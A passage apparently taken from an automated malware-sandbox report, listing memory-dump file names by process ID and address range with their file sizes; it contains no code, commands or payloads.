                                                                                                                                  • memory/2060-205-0x0000000002960000-0x0000000002961000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-352-0x0000000002750000-0x0000000002751000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-343-0x0000000003630000-0x0000000003631000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-348-0x0000000003630000-0x0000000003631000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-349-0x0000000002740000-0x0000000002741000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-250-0x00000000029A0000-0x00000000029A1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-159-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2060-330-0x0000000002970000-0x0000000002971000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-346-0x0000000003630000-0x0000000003631000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-338-0x0000000003640000-0x0000000003641000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2060-341-0x0000000003630000-0x0000000003631000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2084-536-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2148-290-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2148-294-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/2208-321-0x00000000022A0000-0x0000000002375000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    852KB

                                                                                                                                  • memory/2208-313-0x0000000002220000-0x000000000229B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    492KB

                                                                                                                                  • memory/2208-198-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2220-695-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2284-220-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2284-214-0x0000000004BF0000-0x0000000004BF1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2284-184-0x0000000000040000-0x0000000000041000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2284-213-0x00000000024B0000-0x00000000024B1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2284-161-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2296-154-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2296-272-0x00000000056E0000-0x00000000056E1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-271-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-303-0x0000000005770000-0x0000000005771000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-243-0x0000000005D00000-0x0000000005D01000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-235-0x0000000000D60000-0x0000000000D61000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-249-0x0000000005640000-0x0000000005641000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-264-0x0000000005900000-0x0000000005901000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2296-255-0x00000000057F0000-0x00000000057F1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2516-307-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    128KB

                                                                                                                                  • memory/2516-302-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2516-367-0x0000000008D40000-0x0000000009358000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    6.1MB

                                                                                                                                  • memory/2516-328-0x00000000009C0000-0x00000000009C1000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/2564-710-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2628-284-0x0000000000610000-0x0000000000618000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/2628-200-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2628-310-0x0000000000620000-0x0000000000629000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                  • memory/2668-165-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2796-540-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/2924-279-0x0000000000620000-0x0000000000628000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/2924-292-0x0000000000630000-0x0000000000639000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                  • memory/2924-171-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3152-288-0x00000000006D0000-0x00000000006F7000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    156KB

                                                                                                                                  • memory/3152-181-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3152-326-0x0000000002210000-0x0000000002254000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    272KB

                                                                                                                                  • memory/3168-542-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3220-364-0x0000000002C40000-0x0000000002C56000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    88KB

                                                                                                                                  • memory/3248-543-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3332-201-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3332-289-0x0000000000190000-0x0000000000191000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3332-316-0x0000000005970000-0x0000000005971000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3416-372-0x0000000005F40000-0x0000000005F41000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/3416-183-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3556-649-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3656-197-0x0000000000B10000-0x0000000000B13000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    12KB

                                                                                                                                  • memory/3656-180-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3672-345-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3736-546-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3940-435-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3956-547-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/3968-491-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4056-549-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4056-187-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4056-391-0x0000000002E10000-0x0000000002E93000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    524KB

                                                                                                                                  • memory/4316-437-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4544-512-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4552-242-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4564-398-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4812-381-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4836-175-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/4972-527-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5032-632-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5048-691-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5056-199-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5068-241-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5100-151-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5100-370-0x0000000004860000-0x0000000004899000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    228KB

                                                                                                                                  • memory/5176-683-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5204-552-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5380-557-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5448-564-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5504-692-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5564-648-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5600-578-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5700-583-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5700-713-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/5944-617-0x0000000000000000-mapping.dmp
                                                                                                                                  • memory/6084-606-0x0000000000000000-mapping.dmp